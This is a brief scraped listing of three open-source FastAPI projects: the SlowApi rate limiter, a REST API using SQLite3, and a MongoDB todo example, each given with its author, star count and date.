    A rate limiter for Starlette and FastAPI

    SlowApi A rate limiting library for Starlette and FastAPI adapted from flask-limiter. Note: this is alpha quality code still, the API may change, and

    Laurent Savaete 565 Jan 2, 2023
    REST API with FastAPI and SQLite3.

    REST API with FastAPI and SQLite3

    Luis Quiñones Requelme 2 Mar 14, 2022
    Example of using FastAPI and MongoDB database.

    FastAPI Todo Application Example of using FastAPI and MangoDB database. ?? Prerequisites Python ⚙️ Build & Run The first thing to do is to clone the r

    Bobynets Ivan 1 Oct 29, 2021